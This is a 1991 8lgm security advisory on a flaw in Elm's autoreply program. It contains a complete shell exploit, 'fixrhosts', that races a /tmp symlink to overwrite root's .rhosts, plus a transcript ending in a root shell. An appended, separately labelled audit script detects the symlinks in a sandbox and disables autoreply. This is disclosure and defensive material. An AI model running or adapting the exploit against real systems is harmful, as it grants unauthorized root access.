
This advisory has been sent to:

	comp.security.unix
	INFOHAX			<infohax-emergency@stormking.com>
	BUGTRAQ			<chasin@crimelab.com>
	CERT/CC			<cert@cert.org>
	Elm Maintainers		<elm@DSI.COM>

===========================================================================
		[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991

PROGRAM:

	autoreply(1)	(/usr/local/bin/autoreply)
			Supplied with the Elm Mail System

VULNERABLE OS's:

	Any system with a standard installation of The Elm Mail System.
	All versions are believed to have this vulnerability.

DESCRIPTION:

	autoreply(1) can be used to create root-owned files with mode
	666.  It can also overwrite any file with partially
	user-controlled data.

IMPACT:

	Any user with access to autoreply(1) can alter system files and
	thus become root.

REPEAT BY:

	This example demonstrates how to become root on most affected
	machines by modifying root's .rhosts file.  Please do not do
	this unless you have permission.

	Create the following script, 'fixrhosts':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
	echo "Usage: `basename $0` rhosts-file user machine"
	exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------

	(Lines marked with > represent user input)

>	% id
	uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>	% ./fixrhosts ~root/.rhosts 8lgm localhost
	You've been added to the autoreply system.
	You've been removed from the autoreply table.
>	% rsh localhost -l root csh -i
	Warning: no access to tty.
	Thus no job control in this shell.
	# 
FIX:

	1. Disable autoreply.
	2. Wait for a patch from the Elm maintainers.
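
	A defender-side audit for the artefacts this advisory describes,
	added here and not taken from the advisory or from Elm: it flags
	/tmp/arep.NNNNNN symlinks that point outside /tmp (the link the
	script above creates) and applies fix 1 by stripping the setuid
	and execute bits from autoreply.  It assumes autoreply is
	installed setuid root, which the root-owned files in DESCRIPTION
	imply; the sandbox paths and the arep.000123 link are constructed
	so the script runs offline.

```sh
# Added audit script, not from the 8lgm advisory or Elm. Checks for the
# two artefacts the advisory describes -- a setuid autoreply binary and
# /tmp/arep.NNNNNN symlinks pointing outside /tmp -- and applies fix 1
# (disable autoreply). Paths are parameters so it can be run against the
# constructed sandbox below instead of the live system.

# Report every arep.* symlink in $1 whose target lies outside $1.
# Returns 1 if at least one such link was found, 0 otherwise.
find_stray_arep_links() {
    dir="$1"; found=0
    for link in "$dir"/arep.*; do
        [ -L "$link" ] || continue
        target=$(readlink "$link")
        case "$target" in
            "$dir"/*) ;;    # stays inside the temp dir: expected
            *) echo "stray symlink: $link -> $target"; found=1 ;;
        esac
    done
    return $found
}

# Fix 1: make autoreply unusable until a patched version is installed.
# Returns 0 if it was setuid and is now disabled, 1 if it was not setuid
# (nothing to do), 2 if the binary is absent.
disable_autoreply() {
    bin="$1"
    [ -f "$bin" ] || return 2
    [ -u "$bin" ] || return 1
    chmod u-s,a-x "$bin" && echo "disabled: $bin"
}

# Constructed sandbox: a fake /tmp holding one link of the kind the
# advisory's script creates (arep.000123 -> a file outside /tmp), one
# benign link, and a fake setuid autoreply. Prints the sandbox path.
make_sandbox() {
    sb=$(mktemp -d) || return 1
    mkdir "$sb/tmp" "$sb/bin"
    : > "$sb/target"                              # stands in for ~root/.rhosts
    ln -s "$sb/target" "$sb/tmp/arep.000123"
    ln -s "$sb/tmp/other" "$sb/tmp/arep.000124"
    printf '#!/bin/sh\nexit 0\n' > "$sb/bin/autoreply"
    chmod 4755 "$sb/bin/autoreply"
    echo "$sb"
}

SANDBOX=$(make_sandbox)
find_stray_arep_links "$SANDBOX/tmp" || echo "audit: stray arep links found"
disable_autoreply "$SANDBOX/bin/autoreply"
rm -rf "$SANDBOX"
```

	On a live host, call the two check functions with /tmp and
	/usr/local/bin/autoreply instead of the sandbox paths.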


FEEDBACK AND CONTACT INFORMATION:

	8lgm-bugs@bagpuss.demon.co.uk		(To report security flaws)

	8lgm-request@bagpuss.demon.co.uk	(Request for [8lgm] Advisories)

	8lgm@bagpuss.demon.co.uk		(General enquiries)

	System Administrators are encouraged to contact us for any
	other information they may require about the problems described
	in this advisory.

	We welcome reports about which platforms this flaw does or does
	not exist on.

===========================================================================